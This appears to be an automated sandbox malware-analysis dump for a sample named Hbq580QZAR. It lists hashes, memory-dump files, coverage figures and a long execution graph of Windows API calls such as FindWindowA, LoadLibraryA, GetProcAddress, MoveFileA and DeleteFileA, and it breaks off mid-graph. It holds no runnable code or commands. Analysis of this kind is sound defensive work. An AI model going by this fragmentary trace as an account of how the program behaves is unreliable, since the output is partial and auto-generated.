                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:16%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:4.6%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:87
                                                                                            execution_graph 49970 40cd00 49971 40cd12 49970->49971 49972 40cd0d 49970->49972 49974 406f48 CloseHandle 49972->49974 49974->49971 49975 492848 49976 49287c 49975->49976 49977 49287e 49976->49977 49978 492892 49976->49978 50121 446f9c 32 API calls 49977->50121 49981 4928ce 49978->49981 49982 4928a1 49978->49982 49980 492887 Sleep 50041 4928c9 49980->50041 49987 49290a 49981->49987 49988 4928dd 49981->49988 50111 446ff8 49982->50111 49986 4928b0 49989 4928b8 FindWindowA 49986->49989 49993 492919 49987->49993 49994 492960 49987->49994 49990 446ff8 32 API calls 49988->49990 50115 447278 49989->50115 49992 4928ea 49990->49992 49996 4928f2 FindWindowA 49992->49996 50122 446f9c 32 API calls 49993->50122 50000 4929bc 49994->50000 50001 49296f 49994->50001 49998 447278 19 API calls 49996->49998 49997 492925 50123 446f9c 32 API calls 49997->50123 50054 492905 49998->50054 50008 492a18 50000->50008 50009 4929cb 50000->50009 50126 446f9c 32 API calls 50001->50126 50003 492932 50124 446f9c 32 API calls 50003->50124 50004 49297b 50127 446f9c 32 API calls 50004->50127 50007 49293f 50125 446f9c 32 API calls 50007->50125 50019 492a52 50008->50019 50020 492a27 50008->50020 50131 446f9c 32 API calls 50009->50131 50010 492988 50128 446f9c 32 API calls 50010->50128 50014 49294a SendMessageA 50018 447278 19 API calls 50014->50018 50015 4929d7 50132 446f9c 32 API calls 50015->50132 50017 492995 50129 446f9c 32 API calls 50017->50129 50018->50054 50028 492a61 50019->50028 50029 492aa0 50019->50029 50023 446ff8 32 API calls 50020->50023 50021 4929e4 50133 446f9c 32 API calls 50021->50133 50026 492a34 50023->50026 50025 4929a0 PostMessageA 50130 4470d0 19 API calls 50025->50130 50033 492a3c RegisterClipboardFormatA 50026->50033 50027 4929f1 50134 446f9c 32 API calls 50027->50134 50136 446f9c 32 API calls 50028->50136 50037 492aaf 50029->50037 50043 492af4 50029->50043 50034 447278 19 API calls 50033->50034 50034->50041 50035 4929fc SendNotifyMessageA 50135 4470d0 19 API calls 50035->50135 50036 492a6d 50137 446f9c 32 API calls 50036->50137 50139 446f9c 32 API calls 50037->50139 50161 403420 50041->50161 50042 492a7a 50138 446f9c 32 API calls 50042->50138 50048 492b48 50043->50048 50049 492b03 50043->50049 50044 492abb 50140 446f9c 32 API calls 50044->50140 50047 492a85 SendMessageA 50051 447278 19 API calls 50047->50051 50058 492baa 50048->50058 50059 492b57 50048->50059 50143 446f9c 32 API calls 50049->50143 50050 492ac8 50141 446f9c 32 API calls 50050->50141 50051->50054 50054->50041 50055 492b0f 50144 446f9c 32 API calls 50055->50144 50057 492ad3 PostMessageA 50142 4470d0 19 API calls 50057->50142 50066 492bb9 50058->50066 50067 492c31 50058->50067 50062 446ff8 32 API calls 50059->50062 50060 492b1c 50145 446f9c 32 API calls 50060->50145 50064 492b64 50062->50064 50147 42e394 SetErrorMode 50064->50147 50065 492b27 SendNotifyMessageA 50146 4470d0 19 API calls 50065->50146 50070 446ff8 32 API calls 50066->50070 50075 492c40 50067->50075 50076 492c66 50067->50076 50072 492bc8 50070->50072 50071 492b71 50073 492b87 GetLastError 50071->50073 50074 492b77 50071->50074 50150 446f9c 32 API calls 50072->50150 50077 447278 19 API calls 50073->50077 50078 447278 19 API calls 50074->50078 50155 446f9c 32 API calls 50075->50155 50085 492c98 50076->50085 50086 492c75 50076->50086 50079 492b85 50077->50079 50078->50079 50082 447278 19 API calls 50079->50082 50081 492c4a FreeLibrary 50156 4470d0 19 API calls 50081->50156 50082->50041 50094 492ca7 50085->50094 50100 492cdb 50085->50100 50090 446ff8 32 API calls 50086->50090 50087 492bdb GetProcAddress 50088 492c21 50087->50088 50089 492be7 50087->50089 50154 4470d0 19 API calls 50088->50154 50151 446f9c 32 API calls 50089->50151 50092 492c81 50090->50092 50098 492c89 CreateMutexA 50092->50098 50157 48ccc8 32 API calls 50094->50157 50095 492bf3 50152 446f9c 32 API calls 50095->50152 50098->50041 50099 492c00 50103 447278 19 API calls 50099->50103 50100->50041 50159 48ccc8 32 API calls 50100->50159 50102 492cb3 50104 492cc4 OemToCharBuffA 50102->50104 50105 492c11 50103->50105 50158 48cce0 19 API calls 50104->50158 50153 4470d0 19 API calls 50105->50153 50108 492cf6 50109 492d07 CharToOemBuffA 50108->50109 50160 48cce0 19 API calls 50109->50160 50112 447000 50111->50112 50165 436078 50112->50165 50114 44701f 50114->49986 50116 447280 50115->50116 50278 4363e0 VariantClear 50116->50278 50118 4472a3 50119 4472ba 50118->50119 50279 408c0c 18 API calls 50118->50279 50119->50041 50121->49980 50122->49997 50123->50003 50124->50007 50125->50014 50126->50004 50127->50010 50128->50017 50129->50025 50130->50054 50131->50015 50132->50021 50133->50027 50134->50035 50135->50041 50136->50036 50137->50042 50138->50047 50139->50044 50140->50050 50141->50057 50142->50054 50143->50055 50144->50060 50145->50065 50146->50041 50280 403738 50147->50280 50150->50087 50151->50095 50152->50099 50153->50054 50154->50054 50155->50081 50156->50041 50157->50102 50158->50041 50159->50108 50160->50041 50163 403426 50161->50163 50162 40344b 50163->50162 50164 402660 4 API calls 50163->50164 50164->50163 50166 436084 50165->50166 50176 4360a6 50165->50176 50166->50176 50185 408c0c 18 API calls 50166->50185 50167 436129 50194 408c0c 18 API calls 50167->50194 50169 436111 50189 403494 50169->50189 50170 436105 50170->50114 50171 4360f9 50180 403510 18 API calls 50171->50180 50172 4360ed 50186 403510 50172->50186 50173 43611d 50193 4040e8 32 API calls 50173->50193 50176->50167 50176->50169 50176->50170 50176->50171 50176->50172 50176->50173 50179 43613a 50179->50114 50184 436102 50180->50184 50182 436126 50182->50114 50184->50114 50185->50176 50195 4034e0 50186->50195 50190 403498 50189->50190 50191 4034ba 50190->50191 50192 402660 4 API calls 50190->50192 50191->50114 50192->50191 50193->50182 50194->50179 50200 4034bc 50195->50200 50197 4034f0 50205 403400 50197->50205 50201 4034c0 50200->50201 50202 4034dc 50200->50202 50209 402648 50201->50209 50202->50197 50204 4034c9 50204->50197 50206 403406 50205->50206 50207 40341f 50205->50207 50206->50207 50273 402660 50206->50273 50207->50114 50210 40264c 50209->50210 50212 402656 50209->50212 50215 402088 50210->50215 50211 402652 50211->50212 50226 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50211->50226 50212->50204 50212->50212 50216 40209c 50215->50216 50217 4020a1 50215->50217 50227 4019cc RtlInitializeCriticalSection 50216->50227 50219 4020c6 RtlEnterCriticalSection 50217->50219 50220 4020d0 50217->50220 50221 4020a5 50217->50221 50219->50220 50220->50221 50234 401f94 50220->50234 50221->50211 50224 4021f1 RtlLeaveCriticalSection 50225 4021fb 50224->50225 50225->50211 50226->50212 50228 4019f0 RtlEnterCriticalSection 50227->50228 50229 4019fa 50227->50229 50228->50229 50230 401a18 LocalAlloc 50229->50230 50231 401a32 50230->50231 50232 401a81 50231->50232 50233 401a77 RtlLeaveCriticalSection 50231->50233 50232->50217 50233->50232 50237 401fa4 50234->50237 50235 401fd0 50239 401ff4 50235->50239 50245 401db4 50235->50245 50237->50235 50237->50239 50240 401f0c 50237->50240 50239->50224 50239->50225 50249 40178c 50240->50249 50244 401f29 50244->50237 50246 401e02 50245->50246 50247 401dd2 50245->50247 50246->50247 50260 401d1c 50246->50260 50247->50239 50255 4017a8 50249->50255 50250 4014e4 LocalAlloc VirtualAlloc VirtualFree 50250->50255 50251 4017b2 50252 401678 VirtualAlloc 50251->50252 50256 4017be 50252->50256 50253 40180f 50253->50244 50259 401e80 9 API calls 50253->50259 50254 4013e0 LocalAlloc 50254->50255 50255->50250 50255->50251 50255->50253 50255->50254 50257 401803 50255->50257 50256->50253 50258 4015c0 VirtualFree 50257->50258 50258->50253 50259->50244 50261 401d2e 50260->50261 50262 401d51 50261->50262 50263 401d63 50261->50263 50264 401940 LocalAlloc VirtualFree VirtualFree 50262->50264 50265 401940 LocalAlloc VirtualFree VirtualFree 50263->50265 50266 401d61 50264->50266 50265->50266 50267 401d79 50266->50267 50268 401bf8 9 API calls 50266->50268 50267->50247 50269 401d88 50268->50269 50270 401da2 50269->50270 50271 401c4c 9 API calls 50269->50271 50272 401454 LocalAlloc 50270->50272 50271->50270 50272->50267 50274 402664 50273->50274 50275 40266e 50273->50275 50274->50275 50277 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50274->50277 50275->50207 50277->50275 50278->50118 50279->50119 50281 40373c LoadLibraryA 50280->50281 50281->50071 54038 498ba8 54096 403344 54038->54096 54040 498bb6 54099 4056a0 54040->54099 54042 498bbb 54102 40631c GetModuleHandleA GetProcAddress 54042->54102 54046 498bc5 54110 40994c 54046->54110 54378 4032fc 54096->54378 54098 403349 GetModuleHandleA GetCommandLineA 54098->54040 54101 4056db 54099->54101 54379 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54099->54379 54101->54042 54103 406338 54102->54103 54104 40633f GetProcAddress 54102->54104 54103->54104 54105 406355 GetProcAddress 54104->54105 54106 40634e 54104->54106 54107 406364 SetProcessDEPPolicy 54105->54107 54108 406368 54105->54108 54106->54105 54107->54108 54109 4063c4 6FAA1CD0 54108->54109 54109->54046 54380 409024 54110->54380 54378->54098 54379->54101 54381 408cbc 19 API calls 54380->54381 54382 409035 54381->54382 54383 4085dc GetSystemDefaultLCID 54382->54383 54386 408612 54383->54386 54384 406dec 19 API calls 54384->54386 54385 408568 19 API calls 54385->54386 54386->54384 54386->54385 54387 403450 18 API calls 54386->54387 54391 408674 54386->54391 54387->54386 54388 406dec 19 API calls 54388->54391 54389 408568 19 API calls 54389->54391 54390 403450 18 API calls 54390->54391 54391->54388 54391->54389 54391->54390 54392 4086f7 54391->54392 54393 403420 4 API calls 54392->54393 54394 408711 54393->54394 54395 408720 GetSystemDefaultLCID 54394->54395 54452 408568 GetLocaleInfoA 54395->54452 54398 403450 18 API calls 54399 408760 54398->54399 54400 408568 19 API calls 54399->54400 54401 408775 54400->54401 54402 408568 19 API calls 54401->54402 54403 408799 54402->54403 54458 4085b4 GetLocaleInfoA 54403->54458 54406 4085b4 GetLocaleInfoA 54407 4087c9 54406->54407 54408 408568 19 API calls 54407->54408 54409 4087e3 54408->54409 54410 4085b4 GetLocaleInfoA 54409->54410 54411 408800 54410->54411 54453 4085a1 54452->54453 54454 40858f 54452->54454 54456 403494 4 API calls 54453->54456 54455 4034e0 18 API calls 54454->54455 54457 40859f 54455->54457 54456->54457 54457->54398 54459 4085d0 54458->54459 54459->54406 55817 42f520 55818 42f52b 55817->55818 55819 42f52f NtdllDefWindowProc_A 55817->55819 55819->55818 50282 416b42 50283 416bea 50282->50283 50284 416b5a 50282->50284 50301 41531c 18 API calls 50283->50301 50286 416b74 SendMessageA 50284->50286 50287 416b68 50284->50287 50297 416bc8 50286->50297 50288 416b72 CallWindowProcA 50287->50288 50289 416b8e 50287->50289 50288->50297 50298 41a058 GetSysColor 50289->50298 50292 416b99 SetTextColor 50293 416bae 50292->50293 50299 41a058 GetSysColor 50293->50299 50295 416bb3 SetBkColor 50300 41a6e0 GetSysColor CreateBrushIndirect 50295->50300 50298->50292 50299->50295 50300->50297 50301->50297 55820 4358e0 55821 4358f5 55820->55821 55824 43590f 55821->55824 55826 4352c8 55821->55826 55833 435312 55826->55833 55836 4352f8 55826->55836 55827 403400 4 API calls 55828 435717 55827->55828 55828->55824 55839 435728 18 API calls 55828->55839 55829 446da4 18 API calls 55829->55836 55830 403744 18 API calls 55830->55836 55831 403450 18 API calls 55831->55836 55832 402648 18 API calls 55832->55836 55833->55827 55835 431ca0 18 API calls 55835->55836 55836->55829 55836->55830 55836->55831 55836->55832 55836->55833 55836->55835 55837 4038a4 18 API calls 55836->55837 55840 4343b0 55836->55840 55852 434b74 18 API calls 55836->55852 55837->55836 55839->55824 55841 43446d 55840->55841 55842 4343dd 55840->55842 55871 434310 18 API calls 55841->55871 55843 403494 4 API calls 55842->55843 55845 4343eb 55843->55845 55847 403778 18 API calls 55845->55847 55846 43445f 55848 403400 4 API calls 55846->55848 55850 43440c 55847->55850 55849 4344bd 55848->55849 55849->55836 55850->55846 55853 494944 55850->55853 55852->55836 55854 49497c 55853->55854 55855 494a14 55853->55855 55857 403494 4 API calls 55854->55857 55872 448930 55855->55872 55860 494987 55857->55860 55858 494997 55859 403400 4 API calls 55858->55859 55861 494a38 55859->55861 55860->55858 55862 4037b8 18 API calls 55860->55862 55863 403400 4 API calls 55861->55863 55865 4949b0 55862->55865 55864 494a40 55863->55864 55864->55850 55865->55858 55866 4037b8 18 API calls 55865->55866 55867 4949d3 55866->55867 55868 403778 18 API calls 55867->55868 55869 494a04 55868->55869 55870 403634 18 API calls 55869->55870 55870->55855 55871->55846 55873 448955 55872->55873 55874 448998 55872->55874 55875 403494 4 API calls 55873->55875 55877 4489ac 55874->55877 55884 44852c 55874->55884 55876 448960 55875->55876 55881 4037b8 18 API calls 55876->55881 55879 403400 4 API calls 55877->55879 55880 4489df 55879->55880 55880->55858 55882 44897c 55881->55882 55883 4037b8 18 API calls 55882->55883 55883->55874 55885 403494 4 API calls 55884->55885 55886 448562 55885->55886 55887 4037b8 18 API calls 55886->55887 55888 448574 55887->55888 55889 403778 18 API calls 55888->55889 55890 448595 55889->55890 55891 4037b8 18 API calls 55890->55891 55892 4485ad 55891->55892 55893 403778 18 API calls 55892->55893 55894 4485d8 55893->55894 55895 4037b8 18 API calls 55894->55895 55905 4485f0 55895->55905 55896 448628 55898 403420 4 API calls 55896->55898 55897 4486c3 55901 4486cb GetProcAddress 55897->55901 55902 448708 55898->55902 55899 44864b LoadLibraryExA 55899->55905 55900 44865d LoadLibraryA 55900->55905 55903 4486de 55901->55903 55902->55877 55903->55896 55904 403b80 18 API calls 55904->55905 55905->55896 55905->55897 55905->55899 55905->55900 55905->55904 55906 403450 18 API calls 55905->55906 55908 43da88 18 API calls 55905->55908 55906->55905 55908->55905 50302 416644 50303 416651 50302->50303 50304 4166ab 50302->50304 50309 416550 CreateWindowExA 50303->50309 50305 416658 SetPropA SetPropA 50305->50304 50306 41668b 50305->50306 50307 41669e SetWindowPos 50306->50307 50307->50304 50309->50305 55909 4222e4 55910 4222f3 55909->55910 55915 421274 55910->55915 55913 422313 55916 4212e3 55915->55916 55918 421283 55915->55918 55921 4212f4 55916->55921 55940 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55916->55940 55918->55916 55939 408d2c 33 API calls 55918->55939 55919 4213ba 55923 4213ce SetMenu 55919->55923 55936 421393 55919->55936 55920 421322 55926 421395 55920->55926 55930 42133d 55920->55930 55921->55919 55921->55920 55922 4213e6 55943 4211bc 24 API calls 55922->55943 55923->55936 55928 4213a9 55926->55928 55926->55936 55927 4213ed 55927->55913 55938 4221e8 10 API calls 55927->55938 55931 4213b2 SetMenu 55928->55931 55932 421360 GetMenu 55930->55932 55930->55936 55931->55936 55933 421383 55932->55933 55934 42136a 55932->55934 55941 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55933->55941 55937 42137d SetMenu 55934->55937 55936->55922 55942 421e2c 25 API calls 55936->55942 55937->55933 55938->55913 55939->55918 55940->55921 55941->55936 55942->55922 55943->55927 55944 44b4a8 55945 44b4b6 55944->55945 55947 44b4d5 55944->55947 55946 44b38c 25 API calls 55945->55946 55945->55947 55946->55947 55948 448728 55949 448756 55948->55949 55950 44875d 55948->55950 55953 403400 4 API calls 55949->55953 55951 448771 55950->55951 55954 44852c 21 API calls 55950->55954 55951->55949 55952 403494 4 API calls 55951->55952 55955 44878a 55952->55955 55956 448907 55953->55956 55954->55951 55957 4037b8 18 API calls 55955->55957 55958 4487a6 55957->55958 55959 4037b8 18 API calls 55958->55959 55960 4487c2 55959->55960 55960->55949 55961 4487d6 55960->55961 55962 4037b8 18 API calls 55961->55962 55963 4487f0 55962->55963 55964 431bd0 18 API calls 55963->55964 55965 448812 55964->55965 55966 448832 55965->55966 55967 431ca0 18 API calls 55965->55967 55968 448870 55966->55968 55991 4435d0 18 API calls 55966->55991 55967->55965 55969 448888 55968->55969 55992 4435d0 18 API calls 55968->55992 55980 442334 55969->55980 55972 4488bc GetLastError 55993 4484c0 18 API calls 55972->55993 55975 4488cb 55994 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55975->55994 55977 4488e0 55995 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55977->55995 55979 4488e8 55981 443312 55980->55981 55982 44236d 55980->55982 55984 403400 4 API calls 55981->55984 55983 403400 4 API calls 55982->55983 55985 442375 55983->55985 55986 443327 55984->55986 55987 431bd0 18 API calls 55985->55987 55986->55972 55988 442381 55987->55988 55989 443302 55988->55989 55996 441a0c 18 API calls 55988->55996 55989->55972 55991->55966 55992->55969 55993->55975 55994->55977 55995->55979 55996->55988 55997 4165ec DestroyWindow 55998 42e3ef SetErrorMode 50310 441394 50311 44139d 50310->50311 50312 4413ab WriteFile 50310->50312 50311->50312 50313 4413b6 50312->50313 55999 491bf8 56000 491c32 55999->56000 56001 491c3e 56000->56001 56002 491c34 56000->56002 56004 491c4d 56001->56004 56005 491c76 56001->56005 56195 409098 MessageBeep 56002->56195 56007 446ff8 32 API calls 56004->56007 56012 491cae 56005->56012 56013 491c85 56005->56013 56006 403420 4 API calls 56008 49228a 56006->56008 56009 491c5a 56007->56009 56010 403400 4 API calls 56008->56010 56196 406bb0 56009->56196 56014 492292 56010->56014 56019 491cbd 56012->56019 56020 491ce6 56012->56020 56016 446ff8 32 API calls 56013->56016 56018 491c92 56016->56018 56204 406c00 18 API calls 56018->56204 56022 446ff8 32 API calls 56019->56022 56027 491d0e 56020->56027 56028 491cf5 56020->56028 56025 491cca 56022->56025 56023 491c9d 56205 44734c 19 API calls 56023->56205 56206 406c34 18 API calls 56025->56206 56034 491d1d 56027->56034 56035 491d42 56027->56035 56208 407280 19 API calls 56028->56208 56030 491cd5 56207 44734c 19 API calls 56030->56207 56031 491cfd 56209 44734c 19 API calls 56031->56209 56036 446ff8 32 API calls 56034->56036 56038 491d7a 56035->56038 56039 491d51 56035->56039 56037 491d2a 56036->56037 56040 4072a8 SetCurrentDirectoryA 56037->56040 56046 491d89 56038->56046 56047 491db2 56038->56047 56041 446ff8 32 API calls 56039->56041 56042 491d32 56040->56042 56043 491d5e 56041->56043 56210 4470d0 19 API calls 56042->56210 56045 42c804 19 API calls 56043->56045 56048 491d69 56045->56048 56049 446ff8 32 API calls 56046->56049 56052 491dfe 56047->56052 56053 491dc1 56047->56053 56211 44734c 19 API calls 56048->56211 56051 491d96 56049->56051 56212 4071f8 22 API calls 56051->56212 56059 491e0d 56052->56059 56060 491e36 56052->56060 56055 446ff8 32 API calls 56053->56055 56058 491dd0 56055->56058 56056 491da1 56213 44734c 19 API calls 56056->56213 56061 446ff8 32 API calls 56058->56061 56062 446ff8 32 API calls 56059->56062 56067 491e6e 56060->56067 56068 491e45 56060->56068 56063 491de1 56061->56063 56064 491e1a 56062->56064 56214 4918fc 22 API calls 56063->56214 56066 42c8a4 19 API calls 56064->56066 56070 491e25 56066->56070 56075 491e7d 56067->56075 56076 491ea6 56067->56076 56071 446ff8 32 API calls 56068->56071 56069 491ded 56215 44734c 19 API calls 56069->56215 56216 44734c 19 API calls 56070->56216 56074 491e52 56071->56074 56077 42c8cc 19 API calls 56074->56077 56078 446ff8 32 API calls 56075->56078 56083 491ede 56076->56083 56084 491eb5 56076->56084 56079 491e5d 56077->56079 56081 491e8a 56078->56081 56217 44734c 19 API calls 56079->56217 56218 42c8fc 19 API calls 56081->56218 56090 491eed 56083->56090 56091 491f16 56083->56091 56085 446ff8 32 API calls 56084->56085 56087 491ec2 56085->56087 56086 491e95 56219 44734c 19 API calls 56086->56219 56089 42c92c 19 API calls 56087->56089 56092 491ecd 56089->56092 56093 446ff8 32 API calls 56090->56093 56096 491f62 56091->56096 56097 491f25 56091->56097 56220 44734c 19 API calls 56092->56220 56095 491efa 56093->56095 56098 42c954 19 API calls 56095->56098 56104 491f71 56096->56104 56105 491fb4 56096->56105 56099 446ff8 32 API calls 56097->56099 56100 491f05 56098->56100 56101 491f34 56099->56101 56221 44734c 19 API calls 56100->56221 56103 446ff8 32 API calls 56101->56103 56107 491f45 56103->56107 56106 446ff8 32 API calls 56104->56106 56112 491fc3 56105->56112 56113 492027 56105->56113 56108 491f84 56106->56108 56222 42c4f8 19 API calls 56107->56222 56110 446ff8 32 API calls 56108->56110 56114 491f95 56110->56114 56111 491f51 56223 44734c 19 API calls 56111->56223 56116 446ff8 32 API calls 56112->56116 56120 492066 56113->56120 56121 492036 56113->56121 56224 491af4 26 API calls 56114->56224 56118 491fd0 56116->56118 56187 42c608 21 API calls 56118->56187 56119 491fa3 56225 44734c 19 API calls 56119->56225 56131 4920a5 56120->56131 56132 492075 56120->56132 56124 446ff8 32 API calls 56121->56124 56128 492043 56124->56128 56125 491fde 56126 491fe2 56125->56126 56127 492017 56125->56127 56130 446ff8 32 API calls 56126->56130 56227 4470d0 19 API calls 56127->56227 56228 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56128->56228 56135 491ff1 56130->56135 56140 4920e4 56131->56140 56141 4920b4 56131->56141 56136 446ff8 32 API calls 56132->56136 56134 492050 56229 4470d0 19 API calls 56134->56229 56188 452c80 56135->56188 56139 492082 56136->56139 56144 452770 5 API calls 56139->56144 56151 49212c 56140->56151 56152 4920f3 56140->56152 56145 446ff8 32 API calls 56141->56145 56142 492061 56169 491c39 56142->56169 56143 492001 56226 4470d0 19 API calls 56143->56226 56147 49208f 56144->56147 56148 4920c1 56145->56148 56230 4470d0 19 API calls 56147->56230 56231 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56148->56231 56157 49213b 56151->56157 56158 492174 56151->56158 56154 446ff8 32 API calls 56152->56154 56153 4920ce 56232 4470d0 19 API calls 56153->56232 56156 492102 56154->56156 56159 446ff8 32 API calls 56156->56159 56160 446ff8 32 API calls 56157->56160 56163 492187 56158->56163 56167 49223d 56158->56167 56161 492113 56159->56161 56162 49214a 56160->56162 56165 447278 19 API calls 56161->56165 56164 446ff8 32 API calls 56162->56164 56166 446ff8 32 API calls 56163->56166 56168 49215b 56164->56168 56165->56169 56170 4921b4 56166->56170 56167->56169 56236 446f9c 32 API calls 56167->56236 56174 447278 19 API calls 56168->56174 56169->56006 56171 446ff8 32 API calls 56170->56171 56172 4921cb 56171->56172 56233 407ddc 21 API calls 56172->56233 56174->56169 56175 492256 56176 42e8c8 19 API calls 56175->56176 56177 49225e 56176->56177 56237 44734c 19 API calls 56177->56237 56180 4921ed 56181 446ff8 32 API calls 56180->56181 56182 492201 56181->56182 56234 408508 18 API calls 56182->56234 56184 49220c 56235 44734c 19 API calls 56184->56235 56186 492218 56187->56125 56189 452724 2 API calls 56188->56189 56191 452c99 56189->56191 56190 452c9d 56190->56143 56191->56190 56192 452cc1 MoveFileA GetLastError 56191->56192 56193 452760 Wow64RevertWow64FsRedirection 56192->56193 56194 452ce7 56193->56194 56194->56143 56195->56169 56197 406bbf 56196->56197 56198 406bd8 56197->56198 56200 406be1 56197->56200 56199 403400 4 API calls 56198->56199 56201 406bdf 56199->56201 56202 403778 18 API calls 56200->56202 56203 44734c 19 API calls 56201->56203 56202->56201 56203->56169 56204->56023 56205->56169 56206->56030 56207->56169 56208->56031 56209->56169 56210->56169 56211->56169 56212->56056 56213->56169 56214->56069 56215->56169 56216->56169 56217->56169 56218->56086 56219->56169 56220->56169 56221->56169 56222->56111 56223->56169 56224->56119 56225->56169 56226->56169 56227->56169 56228->56134 56229->56142 56230->56169 56231->56153 56232->56169 56233->56180 56234->56184 56235->56186 56236->56175 56237->56169 56238 40cc34 56241 406f10 WriteFile 56238->56241 56242 406f2d 56241->56242 50314 48095d 50319 451004 50314->50319 50316 480971 50329 47fa0c 50316->50329 50318 480995 50320 451011 50319->50320 50322 451065 50320->50322 50338 408c0c 18 API calls 50320->50338 50335 450e88 50322->50335 50326 45108d 50327 4510d0 50326->50327 50340 408c0c 18 API calls 50326->50340 50327->50316 50345 40b3c8 50329->50345 50331 47fa79 50331->50318 50334 47fa2e 50334->50331 50349 4069dc 50334->50349 50352 476994 50334->50352 50341 450e34 50335->50341 50338->50322 50339 408c0c 18 API calls 50339->50326 50340->50327 50342 450e46 50341->50342 50343 450e57 50341->50343 50344 450e4b InterlockedExchange 50342->50344 50343->50326 50343->50339 50344->50343 50346 40b3d3 50345->50346 50347 40b3f3 50346->50347 50368 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50346->50368 50347->50334 50350 402648 18 API calls 50349->50350 50351 4069e7 50350->50351 50351->50334 50362 476a0e 50352->50362 50364 4769c5 50352->50364 50353 476a59 50369 451294 50353->50369 50355 476a70 50357 403420 4 API calls 50355->50357 50359 476a8a 50357->50359 50358 4038a4 18 API calls 50358->50362 50359->50334 50362->50353 50362->50358 50363 403450 18 API calls 50362->50363 50365 403744 18 API calls 50362->50365 50367 451294 35 API calls 50362->50367 50363->50362 50364->50362 50366 451294 35 API calls 50364->50366 50375 4038a4 50364->50375 50384 403744 50364->50384 50388 403450 50364->50388 50365->50362 50366->50364 50367->50362 50368->50347 50370 4512af 50369->50370 50374 4512a4 50369->50374 50394 451238 35 API calls 50370->50394 50372 4512ba 50372->50374 50395 408c0c 18 API calls 50372->50395 50374->50355 50376 4038b1 50375->50376 50383 4038e1 50375->50383 50378 4038da 50376->50378 50380 4038bd 50376->50380 50377 403400 4 API calls 50379 4038cb 50377->50379 50381 4034bc 18 API calls 50378->50381 50379->50364 50396 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50380->50396 50381->50383 50383->50377 50385 40374a 50384->50385 50387 40375b 50384->50387 50386 4034bc 18 API calls 50385->50386 50385->50387 50386->50387 50387->50364 50389 403454 50388->50389 50390 403464 50388->50390 50389->50390 50392 4034bc 18 API calls 50389->50392 50391 403490 50390->50391 50393 402660 4 API calls 50390->50393 50391->50364 50392->50390 50393->50391 50394->50372 50395->50374 50396->50379 50397 41ee54 50398 41ee63 IsWindowVisible 50397->50398 50399 41ee99 50397->50399 50398->50399 50400 41ee6d IsWindowEnabled 50398->50400 50400->50399 50401 41ee77 50400->50401 50402 402648 18 API calls 50401->50402 50403 41ee81 EnableWindow 50402->50403 50403->50399 50404 46bb10 50405 46bb44 50404->50405 50435 46bfad 50404->50435 50409 46bbdc 50405->50409 50410 46bbba 50405->50410 50411 46bbcb 50405->50411 50412 46bb98 50405->50412 50413 46bba9 50405->50413 50422 46bb80 50405->50422 50406 403400 4 API calls 50408 46bfec 50406->50408 50417 403400 4 API calls 50408->50417 50727 46baa0 59 API calls 50409->50727 50460 46b6d0 50410->50460 50726 46b890 81 API calls 50411->50726 50724 46b420 61 API calls 50412->50724 50725 46b588 56 API calls 50413->50725 50421 46bff4 50417->50421 50420 46bb9e 50420->50422 50420->50435 50422->50435 50495 468c74 50422->50495 50423 46bc18 50423->50435 50438 46bc5b 50423->50438 50728 494da0 50423->50728 50426 46bd7e 50747 48358c 137 API calls 50426->50747 50427 414ae8 18 API calls 50427->50438 50430 46bd99 50430->50435 50431 42cbc0 20 API calls 50431->50438 50432 46af68 37 API calls 50432->50438 50435->50406 50436 46bdd7 50513 469f1c 50436->50513 50437 46af68 37 API calls 50437->50435 50438->50426 50438->50427 50438->50431 50438->50432 50438->50435 50438->50436 50439 403450 18 API calls 50438->50439 50456 46be9f 50438->50456 50498 468bb0 50438->50498 50506 46acd4 50438->50506 50651 483084 